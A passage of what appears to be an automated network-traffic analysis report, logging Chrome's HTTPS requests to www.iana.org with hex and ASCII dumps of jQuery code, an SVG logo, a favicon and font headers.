                            Data Ascii: ove(e,t)}}),S.fn.extend({data:function(n,e){var t,r,i,o=this[0],a=o&&o.attributes;if(void 0===n){if(this.length&&(i=Q.get(o),1===o.nodeType&&!Y.get(o,"hasDataAttrs"))){t=a.length;while(t--)a[t]&&0===(r=a[t].name).indexOf("data-")&&(r=X(r.slice(5)),Z(o,r,i
                            2024-10-10 08:17:14 UTC16384INData Raw: 28 65 29 7b 7d 7d 28 29 3d 3d 28 22 66 6f 63 75 73 22 3d 3d 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 29 7b 76 61 72 20 61 2c 73 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 66 6f 72 28 73 20 69 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6e 26 26 28 72 3d 72 7c 7c 6e 2c 6e 3d 76 6f 69 64 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29
                            Data Ascii: (e){}}()==("focus"===t)}function Ee(e,t,n,r,i,o){var a,s;if("object"==typeof t){for(s in"string"!=typeof n&&(r=r||n,n=void 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)
                            2024-10-10 08:17:14 UTC1296INData Raw: 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 57 65 28 65 2c 74 2c 72 29 29 2c 22 6e 6f 72 6d 61 6c 22 3d 3d 3d 69 26 26 74 20 69 6e 20 47 65 26 26 28 69 3d 47 65 5b 74 5d 29 2c 22 22 3d 3d 3d 6e 7c 7c 6e 3f 28 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 69 29 2c 21 30 3d 3d 3d 6e 7c 7c 69 73 46 69 6e 69 74 65 28 6f 29 3f 6f 7c 7c 30 3a 69 29 3a 69 7d 7d 29 2c 53 2e 65 61 63 68 28 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 75 29 7b 53 2e 63 73 73 48 6f 6f 6b 73 5b 75 5d 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 74 29 72 65 74 75 72 6e 21 55 65 2e 74 65 73 74 28 53 2e 63 73 73 28 65 2c 22 64 69 73 70 6c 61 79 22 29 29 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28
                            Data Ascii: )),void 0===i&&(i=We(e,t,r)),"normal"===i&&t in Ge&&(i=Ge[t]),""===n||n?(o=parseFloat(i),!0===n||isFinite(o)?o||0:i):i}}),S.each(["height","width"],function(e,u){S.cssHooks[u]={get:function(e,t,n){if(t)return!Ue.test(S.css(e,"display"))||e.getClientRects(
                            2024-10-10 08:17:14 UTC16384INData Raw: 61 5d 2c 21 31 2c 72 29 3b 72 65 74 75 72 6e 20 6f 7d 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 3f 53 2e 73 74 79 6c 65 28 65 2c 74 2c 6e 29 3a 53 2e 63 73 73 28 65 2c 74 29 7d 2c 65 2c 74 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 7d 29 2c 28 28 53 2e 54 77 65 65 6e 3d 4b 65 29 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 4b 65 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 29 7b 74 68 69 73 2e 65 6c 65 6d 3d 65 2c 74 68 69 73 2e 70 72 6f 70 3d 6e 2c 74 68 69 73 2e 65 61 73 69 6e 67 3d 69 7c 7c 53 2e 65 61 73 69 6e 67 2e 5f 64 65 66 61 75 6c 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 6e 6f 77 3d 74 68 69 73 2e 63
                            Data Ascii: a],!1,r);return o}return void 0!==n?S.style(e,t,n):S.css(e,t)},e,t,1<arguments.length)}}),((S.Tween=Ke).prototype={constructor:Ke,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||S.easing._default,this.options=t,this.start=this.now=this.c
                            2024-10-10 08:17:14 UTC9456INData Raw: 6f 6e 28 29 7b 76 61 72 20 65 3d 53 2e 70 72 6f 70 28 74 68 69 73 2c 22 65 6c 65 6d 65 6e 74 73 22 29 3b 72 65 74 75 72 6e 20 65 3f 53 2e 6d 61 6b 65 41 72 72 61 79 28 65 29 3a 74 68 69 73 7d 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 61 6d 65 26 26 21 53 28 74 68 69 73 29 2e 69 73 28 22 3a 64 69 73 61 62 6c 65 64 22 29 26 26 6b 74 2e 74 65 73 74 28 74 68 69 73 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 21 53 74 2e 74 65 73 74 28 65 29 26 26 28 74 68 69 73 2e 63 68 65 63 6b 65 64 7c 7c 21 70 65 2e 74 65 73 74 28 65 29 29 7d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 53 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 72 65 74 75 72 6e
                            Data Ascii: on(){var e=S.prop(this,"elements");return e?S.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!S(this).is(":disabled")&&kt.test(this.nodeName)&&!St.test(e)&&(this.checked||!pe.test(e))}).map(function(e,t){var n=S(this).val();return


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.449760192.0.33.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:13 UTC366OUTGET /_img/2022/iana-logo-header.svg HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:13 UTC1080INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:13 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 32870
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:30:18 GMT
                            X-Content-Type-Options: nosniff
                            Age: 1015
                            Content-Type: image/svg+xml
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:13 UTC7588INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 49 41 4e 41 5f 48 65 61 64 65 72 5f 4c 6f 67 6f 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="IANA_Header_Logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink
                            2024-10-10 08:17:13 UTC2720INData Raw: 34 2d 31 2e 38 34 38 63 30 2d 30 2e 37 34 36 2c 30 2e 31 34 35 2d 31 2e 34 2c 30 2e 34 33 34 2d 31 2e 39 36 63 30 2e 32 38 39 2d 30 2e 35 36 2c 30 2e 36 38 36 2d 31 2e 30 32 36 2c 31 2e 31 39 2d 31 2e 34 0a 09 09 63 30 2e 35 30 34 2d 30 2e 33 37 33 2c 31 2e 30 38 37 2d 30 2e 36 35 32 2c 31 2e 37 35 2d 30 2e 38 34 63 30 2e 36 36 33 2d 30 2e 31 38 37 2c 31 2e 33 36 37 2d 30 2e 32 38 2c 32 2e 31 31 34 2d 30 2e 32 38 63 30 2e 34 36 36 2c 30 2c 31 2e 30 31 37 2c 30 2e 30 33 33 2c 31 2e 36 35 32 2c 30 2e 30 39 39 0a 09 09 63 30 2e 36 33 34 2c 30 2e 30 36 35 2c 31 2e 32 32 32 2c 30 2e 31 37 33 2c 31 2e 37 36 34 2c 30 2e 33 32 32 63 2d 30 2e 30 31 39 2c 30 2e 33 35 34 2d 30 2e 30 36 31 2c 30 2e 37 33 37 2d 30 2e 31 32 36 2c 31 2e 31 34 37 63 2d 30 2e 30 36 36 2c
                            Data Ascii: 4-1.848c0-0.746,0.145-1.4,0.434-1.96c0.289-0.56,0.686-1.026,1.19-1.4c0.504-0.373,1.087-0.652,1.75-0.84c0.663-0.187,1.367-0.28,2.114-0.28c0.466,0,1.017,0.033,1.652,0.099c0.634,0.065,1.222,0.173,1.764,0.322c-0.019,0.354-0.061,0.737-0.126,1.147c-0.066,
                            2024-10-10 08:17:13 UTC1360INData Raw: 31 2e 30 36 33 2d 30 2e 32 34 33 2d 31 2e 38 31 2d 30 2e 37 32 38 2d 32 2e 32 33 39 0a 09 09 63 2d 30 2e 34 38 36 2d 30 2e 34 33 2d 31 2e 31 35 38 2d 30 2e 36 34 35 2d 32 2e 30 31 36 2d 30 2e 36 34 35 63 2d 31 2e 37 39 32 2c 30 2d 32 2e 36 38 38 2c 30 2e 39 36 32 2d 32 2e 36 38 38 2c 32 2e 38 38 34 63 30 2c 31 2e 30 30 39 2c 30 2e 32 33 33 2c 31 2e 37 33 36 2c 30 2e 37 2c 32 2e 31 38 35 0a 09 09 63 30 2e 34 36 36 2c 30 2e 34 34 38 2c 31 2e 31 32 39 2c 30 2e 36 37 32 2c 31 2e 39 38 38 2c 30 2e 36 37 32 63 30 2e 38 35 38 2c 30 2c 31 2e 35 33 2d 30 2e 32 31 35 2c 32 2e 30 31 36 2d 30 2e 36 34 35 43 31 37 30 2e 32 38 2c 31 32 38 2e 30 37 34 2c 31 37 30 2e 35 32 32 2c 31 32 37 2e 33 33 37 2c 31 37 30 2e 35 32 32 2c 31 32 36 2e 32 39 31 7a 22 2f 3e 0a 09 3c 70
                            Data Ascii: 1.063-0.243-1.81-0.728-2.239c-0.486-0.43-1.158-0.645-2.016-0.645c-1.792,0-2.688,0.962-2.688,2.884c0,1.009,0.233,1.736,0.7,2.185c0.466,0.448,1.129,0.672,1.988,0.672c0.858,0,1.53-0.215,2.016-0.645C170.28,128.074,170.522,127.337,170.522,126.291z"/><p
                            2024-10-10 08:17:13 UTC6800INData Raw: 34 36 32 2d 33 2e 34 38 35 0a 09 09 63 30 2e 33 30 38 2d 30 2e 39 38 2c 30 2e 37 32 38 2d 31 2e 37 38 37 2c 31 2e 32 36 2d 32 2e 34 32 32 63 30 2e 35 33 32 2d 30 2e 36 33 35 2c 31 2e 31 36 32 2d 31 2e 31 30 36 2c 31 2e 38 39 2d 31 2e 34 31 34 63 30 2e 37 32 38 2d 30 2e 33 30 39 2c 31 2e 35 32 31 2d 30 2e 34 36 33 2c 32 2e 33 38 2d 30 2e 34 36 33 0a 09 09 63 31 2e 37 39 32 2c 30 2c 33 2e 31 33 36 2c 30 2e 35 31 39 2c 34 2e 30 33 32 2c 31 2e 35 35 35 53 32 30 34 2e 39 36 32 2c 31 32 35 2e 36 33 39 2c 32 30 34 2e 39 36 32 2c 31 32 37 2e 35 32 33 7a 20 4d 31 39 39 2e 35 33 2c 31 32 33 2e 35 34 38 63 2d 30 2e 39 37 31 2c 30 2d 31 2e 37 33 36 2c 30 2e 33 33 36 2d 32 2e 32 39 36 2c 31 2e 30 30 38 0a 09 09 73 2d 30 2e 38 35 38 2c 31 2e 37 38 32 2d 30 2e 38 39 36
                            Data Ascii: 462-3.485c0.308-0.98,0.728-1.787,1.26-2.422c0.532-0.635,1.162-1.106,1.89-1.414c0.728-0.309,1.521-0.463,2.38-0.463c1.792,0,3.136,0.519,4.032,1.555S204.962,125.639,204.962,127.523z M199.53,123.548c-0.971,0-1.736,0.336-2.296,1.008s-0.858,1.782-0.896
                            2024-10-10 08:17:13 UTC6800INData Raw: 2e 31 32 35 2d 30 2e 32 39 38 2d 31 2e 38 30 37 2d 30 2e 33 39 32 0a 09 09 63 2d 30 2e 36 38 32 2d 30 2e 30 39 33 2d 31 2e 33 32 2d 30 2e 31 34 2d 31 2e 39 31 38 2d 30 2e 31 34 63 2d 31 2e 34 39 33 2c 30 2d 32 2e 32 34 2c 30 2e 36 35 33 2d 32 2e 32 34 2c 31 2e 39 36 63 30 2c 30 2e 34 33 2c 30 2e 31 36 39 2c 30 2e 37 37 34 2c 30 2e 35 30 35 2c 31 2e 30 33 35 0a 09 09 63 30 2e 33 33 36 2c 30 2e 32 36 32 2c 30 2e 37 35 36 2c 30 2e 35 30 35 2c 31 2e 32 36 2c 30 2e 37 32 39 73 31 2e 30 35 35 2c 30 2e 34 34 38 2c 31 2e 36 35 31 2c 30 2e 36 37 32 63 30 2e 35 39 38 2c 30 2e 32 32 34 2c 31 2e 31 34 38 2c 30 2e 35 31 34 2c 31 2e 36 35 32 2c 30 2e 38 36 38 73 30 2e 39 32 34 2c 30 2e 37 39 38 2c 31 2e 32 36 2c 31 2e 33 33 0a 09 09 53 33 34 30 2e 37 33 31 2c 31 33 31
                            Data Ascii: .125-0.298-1.807-0.392c-0.682-0.093-1.32-0.14-1.918-0.14c-1.493,0-2.24,0.653-2.24,1.96c0,0.43,0.169,0.774,0.505,1.035c0.336,0.262,0.756,0.505,1.26,0.729s1.055,0.448,1.651,0.672c0.598,0.224,1.148,0.514,1.652,0.868s0.924,0.798,1.26,1.33S340.731,131
                            2024-10-10 08:17:13 UTC6320INData Raw: 31 0a 09 09 63 30 2c 30 2d 33 2e 30 34 38 2d 33 2e 30 39 31 2d 39 2e 32 33 37 2d 33 2e 31 39 63 2d 36 2e 31 39 2d 30 2e 31 2d 32 33 2e 34 36 37 2c 37 2e 35 37 39 2d 32 39 2e 31 39 35 2c 31 33 2e 39 36 63 2d 35 2e 37 32 38 2c 36 2e 33 38 31 2d 31 35 2e 33 33 36 2c 31 38 2e 31 34 38 2d 31 35 2e 38 39 31 2c 32 34 2e 34 32 39 0a 09 09 63 30 2c 30 2d 31 32 2e 30 31 32 2c 37 2e 36 33 31 2d 31 36 2e 33 32 39 2c 37 2e 37 33 34 63 2d 33 2e 38 30 35 2c 30 2e 30 39 31 2d 33 2e 38 39 36 2d 31 2e 37 35 32 2d 33 2e 38 31 31 2d 33 2e 35 34 37 63 30 2e 31 36 35 2d 33 2e 34 39 34 2c 39 2e 36 30 38 2d 31 36 2e 36 35 31 2c 31 32 2e 32 38 37 2d 32 30 2e 35 34 0a 09 09 63 32 2e 36 37 39 2d 33 2e 38 38 39 2c 31 34 2e 37 38 33 2d 32 32 2e 33 33 36 2c 31 34 2e 37 38 33 2d 32 32
                            Data Ascii: 1c0,0-3.048-3.091-9.237-3.19c-6.19-0.1-23.467,7.579-29.195,13.96c-5.728,6.381-15.336,18.148-15.891,24.429c0,0-12.012,7.631-16.329,7.734c-3.805,0.091-3.896-1.752-3.811-3.547c0.165-3.494,9.608-16.651,12.287-20.54c2.679-3.889,14.783-22.336,14.783-22
                            2024-10-10 08:17:13 UTC1282INData Raw: 30 2e 38 33 34 6c 38 2e 30 32 36 2d 34 2e 38 30 31 63 2d 30 2e 30 31 39 2d 30 2e 39 39 34 2d 30 2e 30 30 39 2d 31 2e 39 39 35 2c 30 2e 30 32 31 2d 33 63 2d 32 2e 38 34 37 2c 30 2e 30 39 39 2d 35 2e 35 33 2c 30 2e 38 37 39 2d 37 2e 39 31 37 2c 32 2e 32 30 36 0a 09 09 43 32 31 2e 35 32 38 2c 37 2e 31 32 39 2c 32 31 2e 34 38 35 2c 38 2e 39 39 33 2c 32 31 2e 35 34 2c 31 30 2e 38 33 34 7a 22 2f 3e 0a 09 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 53 56 47 49 44 5f 34 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 31 36 2e 31 34 35 35 22 20 79 31 3d 22 32 37 2e 36 31 39 31 22 20 78 32 3d 22 32 35 2e 32 39 36 37 22 20 79 32 3d 22 31 34 2e 37 33 39 39 22 3e 0a 09 09 3c 73 74 6f 70
                            Data Ascii: 0.834l8.026-4.801c-0.019-0.994-0.009-1.995,0.021-3c-2.847,0.099-5.53,0.879-7.917,2.206C21.528,7.129,21.485,8.993,21.54,10.834z"/><linearGradient id="SVGID_4_" gradientUnits="userSpaceOnUse" x1="16.1455" y1="27.6191" x2="25.2967" y2="14.7399"><stop


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.449764192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:14 UTC558OUTGET /_img/bookmark_icon.ico HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:14 UTC1090INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 06:58:35 GMT
                            Server: Apache
                            Last-Modified: Sun, 18 Jul 2021 22:53:39 GMT
                            Content-Length: 7406
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Thu, 10 Oct 2024 07:28:35 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 4719
                            Connection: close
                            Content-Type: image/vnd.microsoft.icon
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:14 UTC7124INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 08 00 68 05 00 00 36 00 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 9e 05 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 46 0e 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 77 00 00 50 8b 00 00 42 95 00 00 3e 98 00 00 45 9d 03 00 74 85 04 00 6a 9d 05 00 4b 9d 06 00 49 9d 07 00 95 66 0a 00 86 7a 0a 00 4d a3 0b 00 57 a2 0e 00 48 8e 11 00 50 a1 11 00 54 a9 12 00 b1 62 13 00 8d 77 13 00 75 92 13 00 a4 5c 14 00 85 82 14 00 9b 6c 15 00 69 96 16 00 96 74 17 00 a3 65 19 00 90 54 1b 00 58 a4 1b 00 5a a6 1f 00 7f 57 21 00 5d a9 23 00 99 5e 24 00 99 75 26 00 79 9c 26 00 61 aa 29 00 54 8a 2c 00 a6 55 2f 00 79 a5 2f 00 65 62 30 00 97 3b 34 00 6a af 34 00 aa
                            Data Ascii: h6 00F( {wPB>EtjKIfzMWHPTbwu\liteTXZW!]#^$u&y&a)T,U/y/eb0;4j4
                            2024-10-10 08:17:14 UTC282INData Raw: 00 00 e0 00 00 00 00 03 00 00 c0 00 00 00 00 01 00 00 c0 00 00 00 00 01 00 00 c0 00 00 00 00 01 00 00 80 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 03 00 00 c0 00 00 00 00 03 00 00 c0 00 00 00 00 07 00 00 e0 00 00 00 00 0f 00 00 e0 00 00 00 00 0f 00 00 f0 00 00 00 00 1f 00 00 f8 00 00 00 00 3f 00 00 fc 00 00 00 00 7f 00 00 fe 00 00 00 00 ff 00 00 ff 00 00 00 01 ff 00 00 ff 80 00 00 03 ff 00 00 ff c0 00 00 0f
                            Data Ascii: ?


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.449766192.0.33.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:15 UTC358OUTGET /_img/bookmark_icon.ico HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:15 UTC1091INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 17:12:23 GMT
                            Server: Apache
                            Last-Modified: Sun, 18 Jul 2021 22:53:39 GMT
                            Content-Length: 7406
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 17:42:23 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 54292
                            Connection: close
                            Content-Type: image/vnd.microsoft.icon
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:15 UTC5763INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 08 00 68 05 00 00 36 00 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 9e 05 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 46 0e 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 77 00 00 50 8b 00 00 42 95 00 00 3e 98 00 00 45 9d 03 00 74 85 04 00 6a 9d 05 00 4b 9d 06 00 49 9d 07 00 95 66 0a 00 86 7a 0a 00 4d a3 0b 00 57 a2 0e 00 48 8e 11 00 50 a1 11 00 54 a9 12 00 b1 62 13 00 8d 77 13 00 75 92 13 00 a4 5c 14 00 85 82 14 00 9b 6c 15 00 69 96 16 00 96 74 17 00 a3 65 19 00 90 54 1b 00 58 a4 1b 00 5a a6 1f 00 7f 57 21 00 5d a9 23 00 99 5e 24 00 99 75 26 00 79 9c 26 00 61 aa 29 00 54 8a 2c 00 a6 55 2f 00 79 a5 2f 00 65 62 30 00 97 3b 34 00 6a af 34 00 aa
                            Data Ascii: h6 00F( {wPB>EtjKIfzMWHPTbwu\liteTXZW!]#^$u&y&a)T,U/y/eb0;4j4
                            2024-10-10 08:17:15 UTC1643INData Raw: 25 25 25 25 25 25 25 27 42 7b ab a7 2e 22 34 67 ac c6 c1 c1 c4 c4 c4 c6 c6 c8 a7 07 0d 1c 20 29 29 23 17 17 0a 17 c0 d1 d1 d1 d8 ad 24 24 25 25 25 25 25 25 25 25 25 26 33 6b a4 94 34 43 43 31 3c 84 c4 cb cb c8 cb cb cb cd cb 9d 55 08 29 23 23 17 17 0a 04 72 dd d8 d9 d9 dd 73 0c 25 25 25 25 25 25 25 25 25 25 26 25 6b a4 94 43 44 44 3b 37 1a 45 97 cd d1 cd d1 d1 d1 d1 d8 d1 8d 23 09 17 0a 0a 0f 04 ad e2 df df e3 c5 25 24 25 25 25 25 25 25 25 25 25 25 26 26 6b a4 94 44 3b 37 37 38 39 39 1e 62 d1 d8 d8 d8 d9 d9 d9 dd e2 c9 72 00 00 0f 0b 50 de e5 e5 e5 ec 8b 0c 25 25 25 25 25 25 25 25 25 25 25 26 26 6b ab 92 3b 37 38 39 39 45 45 1b 54 d9 df df df e2 e2 e3 e3 e3 e5 ec c5 63 01 05 8b f2 eb eb f2 e0 4c 1d 25 25 25 25 25 25 25 25 25 25 25 26 26 6b b9 9d 1a 38 39
                            Data Ascii: %%%%%%%'B{."4g ))#$$%%%%%%%%%&3k4CC1<U)##rs%%%%%%%%%%&%kCDD;7E#%$%%%%%%%%%%&&kD;77899brP%%%%%%%%%%%&&k;7899EETcL%%%%%%%%%%%&&k89


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.449772192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:24 UTC595OUTGET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:25 UTC1066INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:24 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 157504
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
